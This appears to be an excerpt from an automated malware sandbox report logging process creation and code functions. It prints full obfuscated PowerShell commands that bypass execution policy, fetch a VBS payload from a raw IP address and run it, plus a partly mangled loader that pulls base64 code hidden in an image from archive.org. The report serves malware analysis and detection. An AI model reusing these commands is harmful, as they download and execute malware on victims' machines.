? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,28_2_004167EF
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A8330E7_2_000007FE89A8330E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE89AA321914_2_000007FE89AA3219
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE89AA114E14_2_000007FE89AA114E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043706A28_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041400528_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043E11C28_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004541D928_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004381E828_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041F18B28_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044627028_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043E34B28_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004533AB28_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0042742E28_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043756628_2_00437566
